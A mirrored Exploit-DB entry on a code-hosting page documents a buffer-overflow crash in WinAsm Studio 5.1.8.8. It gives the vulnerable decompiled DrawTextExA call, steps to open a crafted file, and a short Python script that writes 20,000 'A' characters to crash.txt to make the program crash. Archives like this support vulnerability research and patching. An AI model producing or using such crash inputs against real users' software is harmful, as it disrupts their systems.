bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/38878.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

36 lines
No EOL
985 B
Text
Raw Blame History

********************************************************************************************
# Exploit: WinAsm Studio 5.1.8.8 BOF.
# Date: 12/6/2015
# Exploit Author: Un_N0n
# Vendor: WinAsm
# Software Link: http://www.winasm.net/winasm-studio-updates.html
# Version: 5.1.8.8
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]
Code:
rc.right = 0;
rc.bottom = 0;
DrawTextExA(
hdc,
L"I \t\u6e69\u6c63\u6475e\u6e69\.................\uf64)", <--- XXXtremely big string to draw, thus crashes.
1,
&rc,
0x2CE0u,
&dtp);
*(_DWORD *)(a1 + 420) = rc.right;
[How to?]
1 - Open up WinAsm.exe.
2 - GoTo Files -> Open Files.
3 - Browser the crash.txt in it.
~ Software will Crash.
[crash.txt?]
file = open('crash.txt','w')
file.write("A"*20000) #Crash.txt Contains 20000s As
file.close()
********************************************************************************************
Reference in a new issue View git blame Copy permalink